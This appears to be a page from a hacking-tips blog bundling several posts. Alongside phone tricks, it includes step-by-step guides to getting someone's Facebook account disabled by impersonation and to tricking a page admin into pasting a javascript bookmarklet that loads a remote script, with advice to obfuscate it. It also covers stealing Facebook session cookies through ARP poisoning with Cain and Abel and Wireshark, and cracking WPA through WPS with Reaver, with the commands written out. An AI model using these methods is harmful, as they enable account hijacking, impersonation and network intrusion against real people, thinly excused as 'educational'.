Welcome to the tech blog copacopi

Showing posts with label ETHICAL HACKING. Show all posts
Showing posts with label ETHICAL HACKING. Show all posts

Copy Your Friends Message Inbox To Your Mobile

Hello users
 
Now You Can Copy Your Friends Message Inbox In Your Mobile..
 

Just Follow Below Very Simple Steps:-

1. Turn on your and your Friends bluetooth.
2. Go To Settings>sync and backup>phone switch>copy to this. 
3. Where They Ask to Select other device, Then Select new phone
4. Now You Can See List Which Item You Want To Select Mark It. You can also copy  MMS,NOTE,Contacts.
 5. Press Done And Search the device. Connect with it.

 Done.
Your Friend Inbox Copied Succesfully..
Enjoy And Use This Trick With Your Friends..
 
Please Give Your Valuable Comments Below..
Friend's Don't Forget To Like Us On Facebook.
Read More

Unlock AT&T iPhone 4S Without Losing Jailbreak Using SAM

You can now unlock your AT&T iPhone 4S without having to lose your jailbreak, thanks to SAM (Subscriber Artificial Module). Right now, this is the only working method for unlocking a jailbroken iPhone 4S on AT&T, so do not bother trying it out with jailbreaking tools, such as redsn0w. SAM basically allows you to activate your iPhone using legitimate certificates generated through iTunes. Read on after the jump to understand how SAM works and how you can use it to unlock your iPhone 4S in no time!

As explained in an earlier article on fixing iMessage/FaceTime & Push Notifications On Hacktivated iPhone 4/3GS, “iTunes activates your new iPhone using your official (supported) carrier’s IMSI, taken from the SIM card. When you hacktivate the device for use with unofficial carrier, this process is bypassed by running a daemon constantly in the background, fooling iTunes into believing that the device is already activated. While there are numerous methods and tools available for hacktivation, SAM, a free package on Cydia, spoofs a fake IMSI, making iTunes believe that the device is running on an official carrier’s SIM, thus making the program generate legitimate activation certificates.”
Now that you understand what you’re dealing with, let’s get on with unlocking your iPhone 4S. Stating the obvious, you will need to contact AT&T and inform them of your request to unlock your device, and only then should you proceed with the instructions below to unlock your iPhone 4S.
Disclaimer: Please attempt this guide at your own risk. AddictiveTips won’t be responsible in case your device bricks or damaged in any other way due to this method.
Instructions:








  1. To begin, head over to the Cydia Store and add the following repo to the sources: http://repo.bingner.com  
  2. From that repo, install SAM and go back to the Settings app.
  3. Hit the deactivate iPhonebutton and then connect it to iTunes.  
  4. iTunes will now activate your iPhone and will unlock it in an official way.
That’s it! You’re good to go with an unlocked iPhone 4S! Those with non jailbroken devices can simply tap reset all content and settings and continue to connect the device with iTunes to activate the phone and unlock it.
Read More

How To Delete Your Enemy's Facebook Account

How To Delete Your Enemy's Facebook Account

This tutorial is education purpose only, once deleted profile can never be recovered.

Follow the steps given below:
  • Victim’s profile link ( you can get it easily )
  • His/Her Email which he/she uses to sign in
  • His/Her birth date which he/she has used in the profile
  • Make an Email ID on gmail or yahoo with the first name and last name same as on victim’sfacebook profile.

  • Now you will get this screen

  • Enter details. In the place of ‘ email address where you can be contacted ‘ enter the fake email you created.
  • You will get an email on that ID in which facebook people will ask your problem. Reply to them that you are (put victim’s name here ) and you cant access your facebook account. Also you have lost access to your Email Address associated with the account.
  • After 2-3 days you will get a reply. They will again ask you that you have access to your associated Email or not? Reply them that you still don’t have access to it. And repeat what all you wrote in first mail.
Next Day or Same Day you will get an Email that your account is disabled. 

you may also read :

Read More

How toHack Facebook Fan Page (EXCLUSIVE AT CRACKOHACK)

Hello guys! after receiving a good responce from you i am posting a new trick here at crackohack.in, Well it will tell you about a new hacking technique and also will increase your knowledge so that you may not become victim of such hacks, But Always remember:


Note: Never use these tricks to harm any innocent, Just increase your knowledge and we will not be responsible for any harm caused.

The purpose of this trick and hack is to attack a fan page by fooling the admin by social engineering, I saw some people becoming victim of this, So i decided to teach about this hack to my loyal readers. Don't forget to share this with friends.

Things we shall need:
1. Facebook page hacking exploit.
2. A free hosting.
3. A key or script to run that "Facebook page hacking exploit.".
4. Your facebook email id.
5. Brain ( A bit ;) )

I will try to be simple, but if you don't get anything then kindly ask at comment below.

1. Facebook page hacking exploit:
Download this exploit from the link below, Complete the survey and you will get this exploit for free.
                                           Download script from here                                   

Now, After downloading it you will get key inside it also, and also the exploit, First we have to edit it,

a) Editing the exploit:
First of all see you facebook email id which you used to signup at facebook, see pic below thats the pic of exploit:

Now change the highlighted id to your's facebook id, Above its, bhupinder9dec@gmail.com
2. Get free hosting:Well t35 and 110mb won't help you in this hack :P better go to 000webhost.com and 0fees.net.


Upload the exploit and i recommend change its name from pagehack.js to fanbooster.js or something more attracting.

3. Using the exploit by Key or script:
Use this script to complete this attack. Now the main thing is social engineering,  its up to you that how you give him this script or key, Well Change the following part in the key to your own script path:

javascript:(a = (b = document).createElement("script")).src = "//http://dl.dropbox.com/u/67513625/fanbooster.js", b.body.appendChild(a); void(0)
Change this to your hosting , and also change the exploite name in this key if you have changed it while uploading as suggesting.

Tip: Encode this in ASCII format, Victim might not know what is this.
Now, Give the key to victim (He must be admin of page) and ask him to paste this in browser address bar

Tip: Tell him that it will make your page safe, or something else like attracting

When he will put this key in address bar and thats it you will get a notification that you are admin of his page now.

Enjoy cracking and hacking, But don't hack for bad cause, We  will not be responsible
Read More

How to hack Facebook via Sniffing ?

How to hack Facebook via Sniffing ?
How to hack Facebook via Sniffing?

Hi all users, after receiving your mails that most of facebook hacks doesn't work anymore we have searched and tested and posted some of most popular facebook hacking techniques but still  I think doesn't work for you so finally we've found this technique working 100% for hacking facebook and today we're here to let you know how to do it. So you want to hack Facebook, eh? Before we begin learning how to sniff and start ARP poisoning, let's first begin with this: this tutorial was designed for educational purposes--only! I take no responsibility in whatever damage this may cause to those who wish to participate in this act of hacking! That being said, if you still wish to continue in learning how to get into someone's Facebook without them knowing, proceed along.

There are a couple of terms you will have to know before we begin. This is so that you don't find yourself scratching your head midway through this post wondering what the @$%# I'm talking about. Please understand the following terms and they're respective definitions before proceeding.


  • Cookie:  A cookie is just one or more pieces of information stored as text strings on your machine. A Web server sends you a cookie and the browser stores it. The browser then returns the cookie to the server the next time the page is referenced. Cookies are essentially utilized so that the website can remember certain aspects of that particular website so that when you return it loads the page faster.
  • ARP Spoofing/Poisoning:  ARP stands for Address Resolution Protocol and is a telecommunications protocol used for resolution of network layer addresses into link layer addresses, a critical function in multiple-access networks. It's the "guy" behind the scenes that stands in the middle of all the network traffic, takes in the requests of other computers on the LAN, and returns valuable information/answers. How do you think you get your IP address when you look up ipconfig in CMD? Your computer sends out a request to extract its IP address and the ARP essentially gives you the IP address for your computer. The act of "spoofing" or "poisoning" the ARP, as you probably can already tell, is a very dangerous protocol. By doing so, you are enacting what's called a "man-in-the-middle-attack", MITM for short. When you poison the ARP of a computer within a LAN, you are making yourself the ARP. In other words, all the requests the computers in the network make come directly to you and the answers go directly from you. More on this later.
  • Packet(s): Packet, or packets, are a formatted unit of data carried by a packet mode computer network. They contain literally a million variety of information and provide useful methods in transmitting/receiving requested information. For example, let's take a look at sending an email. On the Internet, the network breaks an e-mail message into parts of a certain size in bytes. These are the packets. Each packet carries the information that will help it get to its destination -- the sender's IP address, the intended receiver's IP address, something that tells the network how many packets this e-mail message has been broken into and the number of this particular packet. The packets carry the data in the protocols that the Internet uses: Transmission Control Protocol/Internet Protocol (TCP/IP). Each packet contains part of the body of your message. Hopefully this gives you a general idea of how packets work and what they provide for both your computer and the internet.
  • Sniffing: Sniffing is usually implied to sniffing network packets. Packet sniffing is the act of eavesdropping on another computer's packet transfer and capturing (saving) those packet transfers for analysis. Though this sounds malicious and wrong, packet sniffing is used widely around the world today for a number of beneficial reasons. But yes, you are correct, just like everything else there are both good and bad intentions for sniffing. An analysis of "sniffed" packets can often times to be used to pick out abusive/malicious acts within a network. An analysis can also provide the "sniffer" to pick out what the slave has been doing and what kind of information the slave's computer has been sending/receiving. Again, just a general definition but you get the picture.
Please read through the definitions and familiarize yourself with the terms before asking what certain things mean here. You can't expect to know every and anything without doing some homework. Trust me, knowing these terms will not only save you time but also give you the benefit of becoming more knowledgeable about basic network definitions Victoire

Software

The following is a comprehensive list of the software you will be needing for this practice. I've given the links to their home pages where you can download the software for free.


Sniffing Your Way In

Now that you're generally familiar with some basic network definitions and have downloaded the required tools to effectively sniff packets, let us begin. Go ahead and open up Firefox and log into your Facebook account. You should be able to see the "cookies" option in the upper-left corner of the toolbar. Click on that and select "View Cookie Information".

You should now see a collective group of information all in regards to the cookies saved on your computer for Facebook. The main cookies are the c_user cookie (which identifies a person uniquely) and datr cookie (which contains important information for the specified c_user). Our goal in sniffing into someone else's Facebook is to trick the browser and the computer into thinking that we are someone else. How do we do this? By manipulating cookies to disguise ourselves. Essentially we are swapping our actual Facebook cookies to that of the slave's so that when we log back into Facebook, it will think we are the slave rather than ourselves. Not too hard to understand, right? Blink

Go ahead and close out of Firefox for now. Next, go and install Cain and Abel. Throughout the installation process, the setup wizard will ask if you want to install the packet driver WinPCap--go ahead and install this. Once you have successfully installed Cain and Abel, open the program. Now follow these steps exactly:
  • Click on configure on top and select your Network card. Mostly its the one with an IP address Tongue.
  • Next click on the start/stop sniffer on top as shown below in green square.
  • Once you start the sniffer, goto the sniffer tab in Cain, right-click and click scan MAC address as shown below!


Depending on your computer and your network population this process can take a couple of minutes. Once it's complete, however, you should be able to pull up a list of computers on your LAN. One cool thing you can do here is right-click one of the computers and find out the computer name. Now it's time for the attack! What was the name of the attack again? Anyone? Did you forget already? Ah, yes, the MITM attack!

Again, follow these steps accurately to effectively spoof the ARP :

  • First Click the APR tab below in cain.
  • Click the white screen in the top frame
  • Click the blue plus on top.


You should get a list of all the devices on the left and a blank screen on the right. In the left screen you should select the router IP. And in the right box, select the computers you want to target. To be safe its better to target one computer. But if you want some real fun then select all the computers on the right frame Hehe. Press "Ok". A caveat in selecting a large amount of computers, however, is that your computer may not be able to handle all the network transmissions and therefore lose some packet captures. Also keep in mind, however, that if someone is working in the router or is monitoring/analyzing the router and actually knows what he/she is doing, they could immediately detect that you are ARP poisoning the router. So be careful! You can get caught.

All the computers should have populated the top-frame. Now select the whole list and click on the nuclear button (top left of Cain, bolded box in the picture below).
And you're done! You've successfully poisoned the ARP of the computers you've selected and you are now the "middle-man" between your slave's computer and the router to the internet. But wait just a second--we can't get into the slave's Facebook just yet! All we've done so far is established ourselves to be the "middle-man". We have to now capture some packets, swap cookies, and voila! We're in.

Now we will open up Wireshark. Follow the steps below :

  • Open up wireshark
  • Go to "Capture –> Interfaces" in the top menu and select your interface. It’s usually the one which has an IP address and a certain number of packets flowing through it.
  • Next go to "Capture" and click on "Start".  
It should look something like this.
This window has all the packets sent from the slave’s/victims’ computer to the router and all the packets sent from the router to the slave.

Next in the filter type “http.cookie contains datr”. You ask why? Because, when a user logs in to facebook, he is given some cookies which is unique to him. If we replace our cookies with the slave’s cookies, we can login to his account as then facebook wont know the difference.

 
After filtering the cookies out, right-click on any one of them and click on "Follow TCP Stream".


In the TCP stream look for the line "Cookie: ( and all cookie names)". If it doesn't show up, select some other packet in Wireshark and click on "Follow TCP Stream" for that particular cookie. You can see the source IP and destination IP in Wireshark. So if you have more than one source IP, then you know you have the cookies of more than one account on your LAN. This is what I got when I did it.

 
You now have the slave's cookies for his/her Facebook. The main ones we need to focus on are the datr cookie, c_user cookie, lu cookie, sct cookie, w cookie and xs cookie. Now open up Firefox and go to Facebook. If you're logged in, log out so that you're at Facebook's home page. Click on the "Cookie" option in the toolbar (as like before) and do the following in this exact order. 
  • Clear session cookies.
  • Delete domain cookies.
  • Delete patch cookies.
Note :-
If you don't do the steps in that same order, this will not work!

Note :- Once you do this, reload the Facebook page (http://www.facebook.com). This is to ensure that you are loading the Facebook page clean without any pre-existing cookies.

Now login to your account with your username and password. After logging in, click on cookies in web developer add-on just like before and click on “View Cookie Information”. You should see all of your Facebook cookies now. Any ideas what we do next? I suspect you know by nowOui.

Click on “Edit Cookie” for each cookies there and replace the cookie value with the value you got through Wireshark. If you didn't get all the cookies in Wireshark, it's OK! But mainly, you should look to replace the datr cookie, c_user cookie, lu cookie, sct cookie, w cookie and xs cookie.
After you have swapped cookies, go ahead and refresh the page. Voila! You should now be logged in as your slave rather than yourself. Congratulations, you have successfully "hacked" your way into someone else's Facebook! Again, please keep in mind that this only works for computers within your LAN. So if you're at home, you can only get into the Facebook of people who are connected at home. No, you cannot hack into the Facebook of someone across the worldNon.

I hope you guys have enjoyed this tutorial! Please feel free to leave me any questions below or PM me with any issues you have. I'll try to respond and reply at my soonest convenience.
If you liked this tutorial then +1 us on google+ and like our facebook fan page to get latest updates like this!
Read More

How To Speed Up The S60 Device


Hello Users, Do you have a nokia s6o phone then there is good news for you ,This time I'm going to share a trick about how to speed up your S60 device.
This trick 100% works.tested so many times.

To do this trick first of all you have to Change your phones’ date to the 10 .08 .2007
Go to the calendar
Now we need to create two new to-do’s ( Options > New entry > To-do )
These two to-do’s need to have the following information :
do :
• Subject : Speed
• Due date : 10 .07 .2007
• Priority : High
do :
• Subject : Qoukie
• Due date : 10 .06 .2007
• Priority : Low
Confirm the both to-do notes with “Done” , but don’t close the calendar application .
Choose : Options > To-do view
Mark “Speed” as done , after
that mark “Qoukie” as done .
Now you can close the calendar .
Change the phones’ date back to the actual day .
Thst's it.Now enjoy faster nokia s60 user interface!!
Read More

How to Crack a Wi-Fi Network’s WPA Password with Reaver

 How to Crack a Wi-Fi Network's WPA Password with ReaverYour Wi-Fi network is your conveniently wireless gateway to the internet, and since you're not keen on sharing your connection with any old hooligan who happens to be walking past your home, you secure your network with a password, right? Knowing, as you might, how easy it is to crack a WEP password, you probably secure your network using the more bulletproof WPA security protocol.
Here's the bad news: A new, free, open-source tool called Reaver exploits a security hole in wireless routers and can crack most routers' current passwords with relative ease. Here's how to crack a WPA or WPA2 password, step by step, with Reaver—and how to protect your network against Reaver attacks.
In the first section of this post, I'll walk through the steps required to crack a WPA password using Reaver. You can follow along with either the video or the text below. After that, I'll explain how Reaver works, and what you can do to protect your network against Reaver attacks.

First, a quick note: As we remind often remind readers when we discuss topics that appear potentially malicious: Knowledge is power, but power doesn't mean you should be a jerk, or do anything illegal. Knowing.
how to pick a lock doesn't make you a thief. Consider this post educational, or a proof-of-concept intellectual exercise. The more you know, the better you can protect yourself.

What You'll Need

You don't have to be a networking wizard to use Reaver, the command-line tool that does the heavy lifting, and if you've got a blank DVD, a computer with compatible Wi-Fi, and a few hours on your hands, you've got basically all you'll need. There are a number of ways you could set up Reaver, but here are the specific requirements for this guide:
  • How to Crack a Wi-Fi Network's WPA Password with ReaverThe BackTrack 5 Live DVD. BackTrack is a bootable Linux distribution that's filled to the brim with network testing tools, and while it's not strictly required to use Reaver, it's the easiest approach for most users. Download the Live DVD from BackTrack's download page and burn it to a DVD. You can alternately download a virtual machine image if you're using VMware, but if you don't know what VMware is, just stick with the Live DVD. As of this writing, that means you should select BackTrack 5 R1 from the Release drop-down, select Gnome, 32- or 64-bit depending on your CPU (if you don't know which you have, 32 is a safe bet), ISO for image, and then download the ISO.
  • A computer with Wi-Fi and a DVD drive. BackTrack will work with the wireless card on most laptops, so chances are your laptop will work fine. However, BackTrack doesn't have a full compatibility list, so no guarantees. You'll also need a DVD drive, since that's how you'll boot into BackTrack. I used a six-year-old MacBook Pro.
  • A nearby WPA-secured Wi-Fi network. Technically, it will need to be a network using WPA security with the WPS feature enabled. I'll explain in more detail in the "How Reaver Works" section how WPS creates the security hole that makes WPA cracking possible.
  • A little patience. This is a 4-step process, and while it's not terribly difficult to crack a WPA password with Reaver, it's a brute-force attack, which means your computer will be testing a number of different combinations of cracks on your router before it finds the right one. When I tested it, Reaver took roughly 2.5 hours to successfully crack my password. The Reaver home page suggests it can take anywhere from 4-10 hours. Your mileage may vary.

Let's Get Crackin'

At this point you should have BackTrack burned to a DVD, and you should have your laptop handy.

Step 1: Boot into BackTrack

How to Crack a Wi-Fi Network's WPA Password with ReaverTo boot into BackTrack, just put the DVD in your drive and boot your machine from the disc. (Google around if you don't know anything about live CDs/DVDs and need help with this part.) During the boot process, BackTrack will prompt you to to choose the boot mode. Select "BackTrack Text - Default Boot Text Mode" and press Enter.
Eventually BackTrack will boot to a command line prompt. When you've reached the prompt, type startx and press Enter. BackTrack will boot into its graphical interface.

Step 2: Install Reaver

Reaver has been added to the bleeding edge version of BackTrack, but it's not yet incorporated with the live DVD, so as of this writing, you need to install Reaver before proceeding. (Eventually, Reaver will simply be incorporated with BackTrack by default.) To install Reaver, you'll first need to connect to a Wi-Fi network that you have the password to.
  1. Click Applications > Internet > Wicd Network Manager
  2. Select your network and click Connect, enter your password if necessary, click OK, and then click Connect a second time.
Now that you're online, let's install Reaver. Click the Terminal button in the menu bar (or click Applications > Accessories > Terminal). At the prompt, type:
 apt-get update 
And then, after the update completes:
 apt-get install reaver 
How to Crack a Wi-Fi Network's WPA Password with ReaverIf all went well, Reaver should now be installed. It may seem a little lame that you need to connect to a network to do this, but it will remain installed until you reboot your computer. At this point, go ahead and disconnect from the network by opening Wicd Network Manager again and clicking Disconnect. (You may not strictly need to do this. I did just because it felt like I was somehow cheating if I were already connected to a network.)

Step 3: Gather Your Device Information, Prep Your Crackin'

In order to use Reaver, you need to get your wireless card's interface name, the BSSID of the router you're attempting to crack (the BSSID is a unique series of letters and numbers that identifies a router), and you need to make sure your wireless card is in monitor mode. So let's do all that.
Find your wireless card: Inside Terminal, type:
 iwconfig 
How to Crack a Wi-Fi Network's WPA Password with ReaverPress Enter. You should see a wireless device in the subsequent list. Most likely, it'll be named wlan0, but if you have more than one wireless card, or a more unusual networking setup, it may be named something different.
Put your wireless card into monitor mode: Assuming your wireless card's interface name is wlan0, execute the following command to put your wireless card into monitor mode:
 airmon-ng start wlan0 
This command will output the name of monitor mode interface, which you'll also want to make note of. Most likely, it'll be mon0, like in the screenshot below. Make note of that.
Find the BSSID of the router you want to crack: Lastly, you need to get the unique identifier of the router you're attempting to crack so that you can point Reaver in the right direction. To do this, execute the following command:
 airodump-ng wlan0 
(Note: If airodump-ng wlan0 doesn't work for you, you may want to try the monitor interface instead—e.g., airodump-ng mon0.)
You'll see a list of the wireless networks in range—it'll look something like the screenshot below:
When you see the network you want, press Ctrl+C to stop the list from refreshing, then copy that network's BSSID (it's the series of letters, numbers, and colons on the far left). The network should have WPA or WPA2 listed under the ENC column.
Now, with the BSSID and monitor interface name in hand, you've got everything you need to start up Reaver.

Step 4: Crack a Network's WPA Password with Reaver

Now execute the following command in the Terminal, replacing bssid and moninterface with the BSSID and monitor interface and you copied down above:
 reaver -i moninterface -b bssid -vv 
For example, if your monitor interface was mon0 like mine, and your BSSID was 8D:AE:9D:65:1F:B2 (a BSSID I just made up), your command would look like:
 reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv 
Press Enter, sit back, and let Reaver work its disturbing magic. Reaver will now try a series of PINs on the router in a brute force attack, one after another. This will take a while. In my successful test, Reaver took 2 hours and 30 minutes to crack the network and deliver me with the correct password. As mentioned above, the Reaver documentation says it can take between 4 and 10 hours, so it could take more or less time than I experienced, depending. When Reaver's cracking has completed, it'll look like this:
A few important factors to consider: Reaver worked exactly as advertised in my test, but it won't necessarily work on all routers (see more below). Also, the router you're cracking needs to have a relatively strong signal, so if you're hardly in range of a router, you'll likely experience problems, and Reaver may not work. Throughout the process, Reaver would sometimes experience a timeout, sometimes get locked in a loop trying the same PIN repeatedly, and so on. I just let it keep on running, and kept it close to the router, and eventually it worked its way through.
Also of note, you can also pause your progress at any time by pressing Ctrl+C while Reaver is running. This will quit the process, but Reaver will save any progress so that next time you run the command, you can pick up where you left off-as long as you don't shut down your computer (which, if you're running off a live DVD, will reset everything).

How Reaver Works

Now that you've seen how to use Reaver, let's take a quick overview of how Reaver works. The tool takes advantage of a vulnerability in something called Wi-Fi Protected Setup, or WPS. It's a feature that exists on many routers, intended to provide an easy setup process, and it's tied to a PIN that's hard-coded into the device. Reaver exploits a flaw in these PINs; the result is that, with enough time, it can reveal your WPA or WPA2 password.
Read more details about the vulnerability at Sean Gallagher's excellent post on Ars Technica.

How to Protect Yourself Against Reaver Attacks

Since the vulnerability lies in the implementation of WPS, your network should be safe if you can simply turn off WPS (or, even better, if your router doesn't support it in the first place). Unfortunately, as Gallagher points out as Ars, even with WPS manually turned off through his router's settings, Reaver was still able to crack his password.
 Special thanks to life hacker

Read More

Certified Ethical Hacker v7 Instructor Slides


Certified Ethical Hacker v7 Instructor Slides


Today we are presenting "Certified Ethical Hacker's set of instructor slide" by eccouncil, we are damn sure that this will surely be helpful for you and for those who want to become an ethical hacker, so guys read on and prove yourselves .

Right now we are going to celebrating new year, Tell us how you will celebrate the new year?

This package includes the following modules.

1. Introduction to Ethical Hacking
2. Footprinting and Reconnaissance
3. Scanning Networks
4. Enumeration
5. System Hacking
6. Trojans and Backdoors
7. Viruses and Worms
8. Sniffers
9. Social Engineering
10. Denial of Service
11. Session Hijacking
12. Hacking Webservers
13. Hacking Web Applications
14. SQL Injection
15. Hacking Wireless Networks
16. Evading IDS, Firewalls and Honeypots
17. Buffer Overflows
18. Cryptography
19. Penetration Testing

Websie :- www.eccouncil.org

Download mediafire

Enjoy.......

Read More

© Copacopi, AllRightsReserved.